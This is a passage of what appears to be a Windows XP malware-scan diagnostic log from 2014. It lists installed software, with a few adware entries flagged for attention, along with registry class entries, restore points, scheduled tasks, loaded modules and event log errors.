High Definition Audio Driver Package - KB888111 (HKLM\...\KB888111WXPSP2) (Version: 20040219.000000 - Microsoft Corporation)
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Photosmart D110 All-In-One Driver Software 14.0 Rel. 7 (HKLM\...\{DBC1DE57-B55A-4D57-9769-1DB9BE506AF7}) (Version: 14.0 - HP)
HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HPAppStudio (Version: 140.0.95.000 - Hewlett-Packard) Hidden
HPProductAssistant (Version: 140.0.212.000 - Hewlett-Packard) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
iTunes (HKLM\...\{0F6F6876-6334-4977-B5DD-CFC12E193420}) (Version: 10.7.0.21 - Apple Inc.)
Java 7 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
Java Auto Updater (Version: 2.1.9.5 - Sun Microsystems, Inc.) Hidden
Journey to Stonehenge (HKLM\...\{2AB5A6A3-71C3-49EE-A253-759E01512FF8}) (Version: 2.00.0000 - Cosmi Corporation)
LightScribe  1.4.74.1 (Version: 1.4.74.1 - http://www.lightscribe.com) Hidden
Linkey (HKCU\...\Linkey) (Version: 0.0.0.480 - Aztec Media Inc) <==== ATTENTION
LiveUpdate 3.0 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 3.0.0.171 - Symantec Corporation)
Lode Runner 2.0 (HKLM\...\Lode Runner_is1) (Version:  - ZX Games)
Mad About Cats (HKLM\...\Mad About Cats) (Version:  - )
MarketResearch (Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 Security Update (KB2572067) (HKLM\...\M2572067) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Default Manager (Version: 2.1.54.0 - Microsoft Corporation) Hidden
Microsoft Internationalized Domain Names Mitigation APIs (Version:  - Microsoft Corporation) Hidden
Microsoft National Language Support Downlevel APIs (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Hybrid 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Search Enhancement Pack (Version: 3.0.126.0 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Software Update for Web Folders  (English) 12 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSN Toolbar (HKLM\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 4.0.0357.1 - Microsoft Corporation)
MSN Toolbar Platform (Version: 4.0.0357.1 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Netflix Movie Viewer (HKLM\...\{BCE72AED-3332-4863-9567-C5DCB9052CA2}) (Version: 1.2.211 - Netflix)
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Backup NOW! 4 (HKLM\...\InstallShield_{385979FE-DC4F-4140-8EAD-A59625000D72}) (Version: 4 - NewTech Infosystems)
NTI Backup NOW! 4 (Version: 4 - NewTech Infosystems) Hidden
NTI CD & DVD-Maker (HKLM\...\InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}) (Version: 7 - NewTech Infosystems)
NTI CD & DVD-Maker (Version: 7 - NewTech Infosystems) Hidden
OCA Client history tool install (HKLM\...\OcaHistoryUpd) (Version: 8.3.0980 - Microsoft Corporation)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Paint.NET v3.36 (HKLM\...\{43602F34-1AA3-44FB-AEB2-D08C2C73743F}) (Version: 3.36.0 - dotPDN LLC)
Pandora (HKLM\...\com.pandora.desktop.E7C14276FFE9EEF0BC7DCE654C467D9A299EFD21.1) (Version: 2.0.8 - PANDORA MEDIA, INC.)
Pandora (Version: 2.0.8 - PANDORA MEDIA, INC.) Hidden
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version:  - CyberLink Corporation)
PS_AIO_07_D110_SW_Min (Version: 140.0.142.000 - Hewlett-Packard) Hidden
QuickConnect (HKLM\...\{4998FF95-709A-430A-B104-92A009ABB848}) (Version: 3.5 - Qwest)
QuickConnect (Version: 3.5 - Qwest) Hidden
QuickTime (HKLM\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
QuickTransfer (Version: 140.0.98.000 - Hewlett-Packard) Hidden
Qwest QuickAssist Desktop Tools (HKLM\...\{A63E18AC-B504-4045-AFE6-A279BBABB988}) (Version: 23 - SupportSoft)
Qwest QuickCare 2.2 (HKLM\...\QwestQuickCare_is1) (Version: 2.2.25.0 - Qwest)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 2.11 - Realtek Semiconductor Corp.)
Remote Desktop Access (VuuPC) (HKLM\...\VOPackage) (Version: 1.0.0.0 - CMI Limited) <==== ATTENTION
Revo Uninstaller 1.93 (HKLM\...\Revo Uninstaller) (Version: 1.93 - VS Revo Group)
ROBLOX Player for Jay (HKCU\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Settings Manager (HKLM\...\Settings Manager) (Version: 5.0.0.13539 - Aztec Media Inc) <==== ATTENTION
SmartFTP Client 3.0 Setup Files (remove only) (HKLM\...\SmartFTP Client 3.0 Setup Files) (Version: 3.0 - SmartSoft)
SmartWebPrinting (Version: 140.0.186.000 - Hewlett-Packard) Hidden
SolutionCenter (Version: 140.0.214.000 - Hewlett-Packard) Hidden
Spotify (HKCU\...\Spotify) (Version: 0.8.8.347.gbcec6996 - Spotify AB)
Star Wars Galactic Battlegrounds (HKLM\...\{A202BDBA-753F-41B9-B649-CFB0B45FC03E}) (Version:  - )
Starcraft (HKLM\...\Starcraft) (Version:  - )
Status (Version: 140.0.256.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.0.1118 - SUPERAntiSpyware.com)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Symantec KB-DocID:2003093015493306 (Version: 1.0.0.1 - Symantec Corporation) Hidden
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
TouchCopy (HKLM\...\{91201F55-A6E6-494C-A930-CAFD3C3CD342}) (Version: 4.10 - Wide Angle Software)
TrayApp (Version: 140.0.212.000 - Hewlett-Packard) Hidden
TurboTax 2010 (HKLM\...\TurboTax 2010) (Version:  - Intuit, Inc)
TurboTax 2010 WinPerFedFormset (Version: 010.000.3688 - Intuit Inc.) Hidden
TurboTax 2010 WinPerReleaseEngine (Version: 010.000.0432 - Intuit Inc.) Hidden
TurboTax 2010 WinPerTaxSupport (Version: 010.000.0208 - Intuit Inc.) Hidden
TurboTax 2010 wrapper (Version: 010.000.0157 - Intuit Inc.) Hidden
TurboTax 2010 wutiper (Version: 010.000.1042 - Intuit Inc.) Hidden
TurboTax 2011 (HKLM\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2011 WinPerFedFormset (Version: 011.000.2999 - Intuit Inc.) Hidden
TurboTax 2011 WinPerReleaseEngine (Version: 011.000.0474 - Intuit Inc.) Hidden
TurboTax 2011 WinPerTaxSupport (Version: 011.000.0214 - Intuit Inc.) Hidden
TurboTax 2011 wrapper (Version: 011.000.0121 - Intuit Inc.) Hidden
TurboTax 2011 wutiper (Version: 011.000.1401 - Intuit Inc.) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2836939v3) (Version: 3 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596848) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{8153EC80-C988-4336-8DAF-6D99C0D26E0C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{5DB2894C-2DA4-4DEF-A051-795AE799964A}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2825642) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{9492511E-2CE0-4904-9400-203F44E1DC0D}) (Version:  - Microsoft)
Update for Windows Internet Explorer 7 (KB976749) (HKLM\...\KB976749-IE7) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 7 (KB980182) (HKLM\...\KB980182-IE7) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676) (HKLM\...\KB2616676) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB951072-v2) (HKLM\...\KB951072-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB951978) (HKLM\...\KB951978) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
URGE (HKLM\...\{8BBF6DFD-0AD9-43A7-9FBD-BF065E3866AF}) (Version: 1.1.9060.0 - MTV Networks)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
WebReg (Version: 140.0.212.017 - Hewlett-Packard) Hidden
When Bugs Attack (HKLM\...\{0367BC04-ADEA-47A5-9F82-96C161C99B52}) (Version: 2.00.0000 - Cosmi Corporation)
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.8.0031.9 - Microsoft Corporation)
Windows Internet Explorer 7 (HKLM\...\ie7) (Version: 20070813.185237 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows Media Player 11 (Version:  - Microsoft Corporation) Hidden
Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031525 - Microsoft Corporation)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
WinZip 12.1 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}) (Version: 12.1.8519 - WinZip Computing, S.L. )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{1796A329-04C1-4C07-B28E-E4A807935C06}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{1A239250-B650-4B63-B4CF-7FCC4DC07DC6}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{1AEDB68D-18A7-4CA9-B41B-3CE7E59FAB24}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{42DF0D46-7D49-4AE5-8EF6-9CA6E41EFEC1}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{63E6BE14-A742-4EEA-8AF3-0EC39F10F850}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{645EEE5A-BD51-4C05-A6AF-6F2CF8950AAB}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Documents and Settings\Jay\Local Settings\Application Data\Conduit\Community Alerts\Alert.dll No  (the data entry has 4 more characters).
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{76D50904-6780-4c8b-8986-1A7EE0B1716D}\InprocServer32 -> C:\Documents and Settings\Jay\Local Settings\Application Data\RobloxVersions\version-759151294bb84441\RobloxProxy.dll (ROBLOX Corporation)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{77C4C807-E257-43AD-BB3F-7CA88760BD29}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{8097D7E9-DB9E-4AEF-9B28-61D82A1DF784}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{9059C329-4661-49B2-9984-8753C45DB7B9}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{A2D4475B-C9AA-48E2-A029-1DB829DACF7B}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{A4F65992-5738-475B-9C16-CF102BCDE153}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{AFD07A5E-3E20-4D77-825C-2F6D1A50BE5B}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{B153D707-447A-4538-913E-6146B3FDEE02}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{CBD4FB70-F00B-4963-B249-4B056E6A981A}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{D93BF052-FC68-4DB6-A4F8-A4DC9BEEB1C0}\localserver32 -> C:\Program Files\Google\Google Earth\googleearth.exe (Google)
CustomCLSID: HKU\S-1-5-21-943902637-2227688448-3181155623-1005_Classes\CLSID\{F4F7B301-7C59-4851-BA97-C51F110B590F}\InprocServer32 -> C:\Program Files\Google\Google Earth\earthps.dll ()

==================== Restore Points  =========================

11-08-2014 01:13:24 System Checkpoint
16-08-2014 03:40:11 System Checkpoint
17-08-2014 20:34:10 System Checkpoint
19-08-2014 03:35:26 Software Distribution Service 3.0
21-08-2014 20:13:15 System Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2004-08-03 23:00 - 2014-08-18 22:44 - 00249174 ____R C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost

There are 1000 more lines.


==================== Scheduled Tasks (whitelisted) =============


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\AppleSoftwareUpdate.job => C:\Program Files\Apple Software Update\SoftwareUpdate.exe
Task: C:\WINDOWS\Tasks\avast! Emergency Update.job => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-08-10 18:58 - 2014-07-28 04:27 - 00488464 _____ () c:\program files\settings manager\smdmf\sysapcrt.dll
2013-08-25 10:28 - 2013-08-25 00:09 - 02095616 _____ () C:\Program Files\AVAST Software\Avast\defs\13082500\algo.dll
2011-09-05 22:24 - 2013-06-11 10:11 - 00240448 ____N () C:\Program Files\AVAST Software\Avast\Setup\SetIFace.dll
2011-09-27 08:23 - 2011-09-27 08:23 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2011-09-27 08:22 - 2011-09-27 08:22 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2008-08-11 08:48 - 2008-08-11 08:48 - 00094720 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2009-10-23 18:39 - 2009-08-16 17:06 - 00141312 _____ () C:\Program Files\WinRAR\rarext.dll
2007-04-24 20:58 - 2007-04-29 20:49 - 00043520 _____ () C:\WINDOWS\system32\CmdLineExt03.dll
2007-04-18 17:14 - 2006-05-19 17:09 - 00352256 _____ () C:\Acer\Empowering Technology\eRecovery\it41.dll
2007-04-18 17:14 - 2006-01-12 10:33 - 00212992 _____ () C:\Acer\Empowering Technology\eRecovery\imagefile.dll
2014-08-10 18:58 - 2014-07-28 04:27 - 00019472 _____ () c:\program files\settings manager\smdmf\smdmfldr.dll
2005-09-21 22:39 - 2005-09-21 22:39 - 00212992 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\dot1x_dll.dll
2004-03-05 16:00 - 2004-03-05 16:00 - 00155648 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\SSLEAY32.dll
2004-03-05 16:00 - 2004-03-05 16:00 - 00827392 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\LIBEAY32.dll
2005-11-01 18:36 - 2005-11-01 18:36 - 00045056 _____ () C:\Program Files\Acer WLAN 11g USB Dongle\ZDWLAN.dll
2014-08-10 14:28 - 2014-08-10 14:29 - 03800688 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2014-07-09 08:01 - 2014-07-09 08:01 - 17029808 _____ () C:\WINDOWS\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


==================== Faulty Device Manager Devices =============

Name: Photosmart D110 series
Description: Photosmart D110 series
Class Guid: {4D36E971-E325-11CE-BFC1-08002BE10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/21/2014 09:22:50 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service. Redirector performance data
will not be returned. Error code returned is in data DWORD 0.

Error: (08/21/2014 09:14:04 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service. Redirector performance data
will not be returned. Error code returned is in data DWORD 0.

Error: (08/21/2014 00:28:00 PM) (Source: .NET Runtime Optimization Service) (EventID: 1103) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Tried to start a service that wasn't the latest version of CLR Optimization service. Will shutdown

Error: (08/21/2014 00:26:22 PM) (Source: PerfNet) (EventID: 2002) (User: )
Description: Unable to open the Redirector service. Redirector performance data
will not be returned. Error code returned is in data DWORD 0.

Error: (08/18/2014 10:53:05 PM) (Source: LoadPerf) (EventID: 3011) (User: )
Description: Unloading the performance counter strings for service ASP.NET (ASP.NET) failed. The
Error code is the first DWORD in Data section.

Error: (08/18/2014 10:53:05 PM) (Source: LoadPerf) (EventID: 3012) (User: )
Description: The performance strings in the Performance registry value is corrupted when
process Performance extension counter provider. BaseIndex value from Performance
registry is the first DWORD in Data section, LastCounter value is the second
DWORD in Data section, and LastHelp value is the third DWORD in Data section.

Error: (08/18/2014 10:53:03 PM) (Source: LoadPerf) (EventID: 3011) (User: )
Description: Unloading the performance counter strings for service aspnet_state (ASP.NET State Service) failed. The
Error code is the first DWORD in Data section.

Error: (08/18/2014 10:53:03 PM) (Source: LoadPerf) (EventID: 3012) (User: )
Description: The performance strings in the Performance registry value is corrupted when
process Performance extension counter provider. BaseIndex value from Performance
registry is the first DWORD in Data section, LastCounter value is the second
DWORD in Data section, and LastHelp value is the third DWORD in Data section.

Error: (08/18/2014 10:53:01 PM) (Source: LoadPerf) (EventID: 3011) (User: )
Description: Unloading the performance counter strings for service ASP.NET_2.0.50727 (ASP.NET_2.0.50727) failed. The
Error code is the first DWORD in Data section.

Error: (08/18/2014 10:53:01 PM) (Source: LoadPerf) (EventID: 3012) (User: )
Description: The performance strings in the Performance registry value is corrupted when
process Performance extension counter provider. BaseIndex value from Performance
registry is the first DWORD in Data section, LastCounter value is the second
DWORD in Data section, and LastHelp value is the third DWORD in Data section.


System errors:
=============
Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Workstation service which failed to start because of the following error:
%%1066

Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Workstation service terminated with service-specific error 2250 (0x8CA).

Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Workstation service which failed to start because of the following error:
%%1066

Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Workstation service terminated with service-specific error 2250 (0x8CA).

Error: (08/21/2014 09:23:01 PM) (Source: Workstation) (EventID: 5727) (User: )
Description: Could not load RDR device driver.

Error: (08/21/2014 09:23:01 PM) (Source: Workstation) (EventID: 5727) (User: )
Description: Could not load RDR device driver.

Error: (08/21/2014 09:22:55 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
ssnfd

Error: (08/21/2014 09:22:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The SupportSoft Listener Service service failed to start due to the following error:
%%2

Error: (08/21/2014 09:22:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intuit Update Service service failed to start due to the following error:
%%2

